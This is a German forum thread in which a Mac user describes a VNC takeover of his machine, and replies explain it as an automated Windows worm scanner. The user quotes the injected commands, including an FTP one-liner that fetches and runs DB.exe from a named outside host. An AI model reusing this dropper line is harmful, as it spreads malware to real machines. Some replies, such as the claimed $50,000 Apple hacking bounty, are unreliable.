1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

In OSX eingedrungen ! Hack-Angriff ?!

Dieses Thema im Forum "macOS & OS X" wurde erstellt von SpArKy87, 03.03.08.

  1. SpArKy87

    SpArKy87 Idared

    Dabei seit:
    12.08.07
    Beiträge:
    26
    Hey Jungs, muss euch doch gerade mal von meinem Erlebnis erzählen:

    War gerade gemütlich dran ein bisschen über Adium zu chatten, als plötzlich mein Screen-Sharing aktiviert wurde (erkennbar am kleinen Monitor der oben in der Leiste erscheint) und ich meine Maus nicht mehr bewegen konnte.

    Plötzlich seh ich nur noch wie irgendwelche Code-Zeilen in mein Adium-Chatfenster mit nem Kumpel eingegeben werden. Dank der Adium-History hab ich sie noch:

    Code:
    %szstemroot%#szstem32#cmd.exe
    und

    Code:
    cmd -c echo open ftpd.xbztey.com.ar 21 :: ik /echo user B0t ?A159753b :: ik /echo binarz :: ik /echo get DB.exe :: ik /echo bze :: ik /ftp ßn ßv ßsÖik /del ik /DB.exe /exit
    Da der Hacker ja cmd.exe in system32 aufrufen wollte, gehe ich davon aus, dass eigentlich ein Windows-PC gehackt werden sollte. Komplett verzweifelt wollte ich dann Screen-Sharing deaktiveren, meine Maus hat allerdings nicht mehr funktioniert. Da ich per WLAN verbunden war, konnte ich dieses auch nicht deaktiveren und mir blieb nur mein Macbook auszuschalten!

    Saukranke Geschichte irgendwie. Weil ich ab und an mal per SSH von der Arbeit aus auf mein Macbook zugegriffen habe, hab ich Port 22 geforwardet. Aber immer mit Passwortschutz und auch kein triviales wie "internet" oder so :D
    Den Portforward habe ich erstmal wieder gelöscht, außerdem "Entfernte Anmeldung" und Screen-Sharing deaktiviert.

    Was meint ihr, sollte ich jetzt neuinstallieren aufgrund der Gefahr das irgendwelche Programme installiert worden sein könnten?! Little Snitch meldet nichts auffälliges...

    Auf jeden Fall sehr krass, wie einfach es scheinbar ist, an der Passwortsicherung vorbeizukommen und komplett zu übernehmen!
    Was meint ihr?

    Oli
     
  2. OSX user

    OSX user Golden Delicious

    Dabei seit:
    10.11.06
    Beiträge:
    6
    Hi,

    ich denke es heisst "sys32.exe" und es ist ein Windows Wurm/Spyware (ich würde versuchen, ihn mit nem Virenscanner zu entfernen).
    Aber Don´t Panic es ist ein Win Virus kann dem Mac also nichts anhaben;)

    Das von dir zitierte sieht aus wie ein Befehl dieses "Ding" runterzuladen.....hmmmm....
    Hast du zufällig Windows Installiert (Paralles,(Bootcamp)...etc...)?????

    Ich tippe darauf, dass Adium eine Fehler produziert hat. Dieses ganze ICQ Zeugs ist doch mit Windows Viren zugemüllt bis zum geht nicht mehr :)

    Hoffe ich konnte helfen;)

    PS:Auf jeden Fall schreibt dieser Wurm auf einer Ami Tastatur da z und y vertauscht sind....;)
    Hier noch ma der Link: http://www.sophos.de/virusinfo/analyses/w32mytobk.html
     
  3. OSX user

    OSX user Golden Delicious

    Dabei seit:
    10.11.06
    Beiträge:
    6
    Windows Virus

    Einfach ClamxAV drüber laufen lassen.......!!!
     
    #3 OSX user, 03.03.08
    Zuletzt bearbeitet: 03.03.08
  4. Bier

    Bier Pomme au Mors

    Dabei seit:
    24.08.07
    Beiträge:
    867
    *g* leicht beeindruckbar seid ihr ja nicht?
     
  5. remur

    remur Ontario

    Dabei seit:
    09.07.07
    Beiträge:
    344
    Das dachte ich auch grade.
    Also ich würde einen Mordsschreck bekommen :D
     
  6. SpArKy87

    SpArKy87 Idared

    Dabei seit:
    12.08.07
    Beiträge:
    26
    also mich hats schon echt geflasht, vorallem als ich garnicht wusste, was ich tun sollte. Tippt da einfach irgendwer was auf meinem Macbook ohne das ich was mache... meine Maus hat gar nicht mehr reagiert, daher konnte ich weder WLAN deaktivieren, noch Screen-Sharing. War schon abgefahrn.

    aber ich merk schon, euch lässt das eher kalt :D

    gruß
     
  7. MyCore

    MyCore Alkmene

    Dabei seit:
    27.02.08
    Beiträge:
    32
    Hi,

    kanns sein das du VNC auf dem mac laufen hast?
    Das von dir beschriebene läuft normal auf port 5900 ab.

    Naja, also das was da geschehen ist, ist ganz einfach, da hat jemand fleisig nach exploits gescannt, bei dem Scannen werden per telnet auf diverse ports gewisse "codezeilen" gesendet die mit etwas glück auf eine unsiche windows kiste durchkommen. Dann wird mit dem befehl den du gesehen hast die file.exe geladen (die eigentlich von praktich keinem Virenscanner beanstandet wird) und ausgeführt. Diese *.exe datei (in Microsoft Visual C++ geschrieben) macht nichts anderes als ein paar kleine tools zu laden (nen ftpd, scann tool und nen kleinen irc bot) und zu starten. Wenn das auf ner windowskiste landet hat das "script-kind" die bestätigung durch den irc bot in nem vorher eingestellten Channel und kann entweder scanvorgänge von dem befallenen rechner aus starten um weitere rechner zu finden oder den rechner als ftp-dump missbrauchen, in den wehnigsten fällen werden darüber weitere software nachgeladen.

    Aber abgesehen von der tatsache das der bei dir leider den auf mac nutzlosen befehl ausführen konnte ist das kein riesen problem für dich. Du solltest nur mal überlegen den port bzw. die sicherheitslücke zu schliesen. Aber es war kein gezielter hack angriff sondern einfach nur nen kleines tool am werk.

    Ich tippe mal auf nen script-kiddie aus der fxp szene, das vorgehen war vor nen paar jahren von denen ganz groß in mode, hat aber mitlerweile etwas nachgelassen *lol*

    Also kurzum, keine panik, VNC schliesen bzw. absichern und weiter langweilen xD
     
  8. Homersektor7g

    Homersektor7g Zuccalmaglios Renette

    Dabei seit:
    30.08.05
    Beiträge:
    262
    Ein Windowsbefehl sollte über ein "icq" Fenster (Adium) auf einem Mac ausgeführt werden? o_O:-D:p
     
  9. Bier

    Bier Pomme au Mors

    Dabei seit:
    24.08.07
    Beiträge:
    867
    Bitte kauft sofort Bier AntiVir :). Das hilft: Herunterzuladen auf der Herstellerseite.
     
  10. MyCore

    MyCore Alkmene

    Dabei seit:
    27.02.08
    Beiträge:
    32
    nein, das script hat sich über einen VNC service auf den rechner eingeloggt, da das script nicht mit rechnet das es bei nem mac gelandet ist sonder denkt es wäre auf ner Windows kiste schiebt es einfach die befehle ein. Da zuletzt das Adium offen war und er was schreiben wollte ist das noch das aktive fenster und der sinnlose code wird da rein geschoben. also der angriff kam nicht über adium/icq
     
  11. wolfsbein

    wolfsbein Jerseymac

    Dabei seit:
    29.06.05
    Beiträge:
    448
    Wenn sich schon ein Script per VNC einloggen kann, so ist es fuer einen Menschen ein Leichtes. Ich wuerde mal schleunigst eine Firewall vor den Mac haengen. Ansonsten sind alle Daten von aussen einseh- und aenderbar.
     
  12. MacApple

    MacApple Lord Grosvenor

    Dabei seit:
    05.01.04
    Beiträge:
    3.470
    Er hat ja geschrieben, dass er Screen Sharing an hatte. Da ist ja VNC.

    MacApple
     
  13. Bier

    Bier Pomme au Mors

    Dabei seit:
    24.08.07
    Beiträge:
    867
    [​IMG]

    Selbiges widerfuhr auch diesem armen Zeitgenossen. Er jedoch hatte ScreenSharing deaktiviert. Gehacktangrifft!
     
    zeno gefällt das.
  14. Rastafari

    Rastafari Golden Noble

    Dabei seit:
    10.03.05
    Beiträge:
    17.902
    Und hinter einer Firewall ändert sich was?
     
  15. wolfsbein

    wolfsbein Jerseymac

    Dabei seit:
    29.06.05
    Beiträge:
    448
    Provizier doch nicht immer so, du weisst es ganz genau. Hinter der Firewall kann von aussen keiner mehr zugreifen, falls der Zugriff nur aus dem Heimnetz gewuenscht ist. Ansonsten ist VNC gaenzlich ungeeignet, weil es per Default nicht verschluesselt. Daher muss ein SSH-Tunnel her. Und den SSH Port kann man dann problemlos forwarden, solange man sich ein gescheites Passwort einfallen laesst.
     
  16. Wieso das denn? Soweit ich weiß bekommt jeder der es schafft einen Mac zu hacken von Apple 50000$. Und das haben bisher höchstens zwei Leute geschafft. Also ein Hack war das sicher nicht.
     
  17. Bier

    Bier Pomme au Mors

    Dabei seit:
    24.08.07
    Beiträge:
    867
    Und wenn Du die Refused Packages aktiv droppst? Firewalls dienen der Netzwerktrennung, schon richtig... Aber glaub man ja nicht, dass das Zauberei ist.
     

Diese Seite empfehlen